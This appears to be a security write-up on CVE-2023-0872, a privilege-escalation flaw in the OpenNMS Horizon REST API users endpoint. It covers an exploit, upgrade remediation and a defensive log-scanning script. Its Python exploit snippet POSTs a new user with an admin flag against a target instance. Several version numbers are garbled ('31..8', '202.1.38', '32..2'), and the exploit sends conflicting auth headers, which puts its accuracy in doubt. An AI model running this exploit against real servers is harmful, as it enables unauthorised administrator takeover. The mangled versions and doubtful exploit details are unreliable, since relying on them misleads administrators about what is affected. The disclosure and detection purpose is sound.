CVE-2023-0872 - Elevation of Privilege in the Horizon REST API: Analysis, Exploit, and Remediation

OpenNMS Group, an open-source provider of network management and monitoring solutions, has recently issued a security advisory for its platforms. The advisory details a critical vulnerability affecting OpenNMS Horizon version 31..8 and earlier versions, as well as installations of Meridian earlier than 2023.1.6, 2022.1.19, 2021.1.30, and 202.1.38. The vulnerability, designated CVE-2023-0872, allows an elevation of privilege through the users endpoint of the Horizon REST API.

Vulnerability Details

The vulnerability lies in the users endpoint of the Horizon REST API. To exploit it, an attacker must first authenticate and have access to the REST API. From that position, the flaw lets the attacker elevate their privileges and compromise the entire OpenNMS Horizon system.

Here is an example code snippet that demonstrates how the vulnerability can be exploited:

import requests
from requests.auth import HTTPBasicAuth

# Replace with the target base URL, REST_API_KEY, USERNAME and PASSWORD
TARGET_BASE_URL = 'https://your-opennms-instance/'
REST_API_KEY = 'your-rest-api-key'
USERNAME = 'your-username'
PASSWORD = 'your-password'

# Craft the malicious request
url = f"{TARGET_BASE_URL}api/v2/users"
headers = {
    'Content-Type': 'application/json',
    'Authorization': f"Bearer {REST_API_KEY}",
}
data = {
    "username": USERNAME,
    "password": PASSWORD,
    "isAdmin": True, # Exploit the vulnerability to set the user as administrator
}

# Send the request and check the response
response = requests.post(url, json=data, headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
if response.status_code == 201:
    print("Success! User privileges have been elevated.")
else:
    print("Error! Exploit failed.")

Original References

For more information about the vulnerability and its related advisory, please refer to the following original sources:

- OpenNMS Security Advisory: LINK
- CVE-2023-0872 Entry: LINK

Remediation

To remediate this vulnerability, upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 202.1.38, or Horizon 32..2 or newer. Keep in mind that, according to the installation instructions provided by OpenNMS, Meridian and Horizon should be installed and deployed within an organization's private network, with no direct access from the internet.

Upgrade your OpenNMS platforms by following the steps provided in the official documentation:

- Meridian Upgrade Guide: LINK
- Horizon Upgrade Guide: LINK
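
For instances that were reachable before the upgrade, the web access logs can be reviewed for successful writes to the users endpoint by accounts that are not expected to manage users. The following is an added example, not code from OpenNMS or its advisory; the NCSA-style log format, the `api/v2/users` path (taken from the snippet above) and the admin allowlist are assumptions to adjust per site.

```python
import re

# Assumptions (not from the advisory): NCSA common/combined access-log format,
# the users endpoint path as written in the snippet above, and a site-maintained
# list of accounts that are expected to manage users.
USERS_PATH = re.compile(r"/api/v2/users(?:/|\?|$)")
WRITE_METHODS = {"POST", "PUT", "DELETE"}
EXPECTED_ADMINS = {"admin"}

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)

def find_suspect_user_writes(lines, admins=EXPECTED_ADMINS):
    """Return successful write requests to the users endpoint made by
    authenticated accounts that are not expected to manage users."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed log format
        if m["method"] not in WRITE_METHODS or not USERS_PATH.search(m["path"]):
            continue  # reads, or requests to other endpoints
        if m["user"] == "-" or m["user"] in admins:
            continue  # unauthenticated request, or an expected administrator
        if not m["status"].startswith("2"):
            continue  # the server rejected the change
        hits.append((m["ts"], m["ip"], m["user"], m["method"],
                     m["path"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up accounts).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Aug/2023:09:12:01 +0000] "POST /api/v2/users HTTP/1.1" 201 0',
    '192.0.2.44 - jdoe [10/Aug/2023:09:15:37 +0000] "GET /api/v2/users HTTP/1.1" 200 512',
    '192.0.2.44 - jdoe [10/Aug/2023:09:15:52 +0000] "POST /api/v2/users HTTP/1.1" 201 0',
    '192.0.2.44 - jdoe [10/Aug/2023:09:16:03 +0000] "PUT /api/v2/users/jdoe HTTP/1.1" 403 0',
    '198.51.100.7 - - [10/Aug/2023:09:20:00 +0000] "POST /api/v2/users HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for hit in find_suspect_user_writes(SAMPLE_LOG):
        print(hit)
```

Any hit should be compared against the current user list and roles, since an account changed before the upgrade keeps its privileges afterwards.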

Acknowledgments

OpenNMS Group expresses its gratitude to Erik Wynter for responsibly disclosing this critical security issue and helping to ensure the safety of OpenNMS users worldwide.

Conclusion

Organizations deploying OpenNMS Horizon and Meridian are advised to take immediate action to upgrade their systems to the latest versions to protect against CVE-2023-0872. By following OpenNMS's guidelines regarding system deployments and ensuring that timely upgrades are performed, organizations can maintain the security and stability of their network management solutions.

Timeline

Published on: 08/14/2023 18:15:00 UTC
Last modified on: 08/21/2023 17:12:00 UTC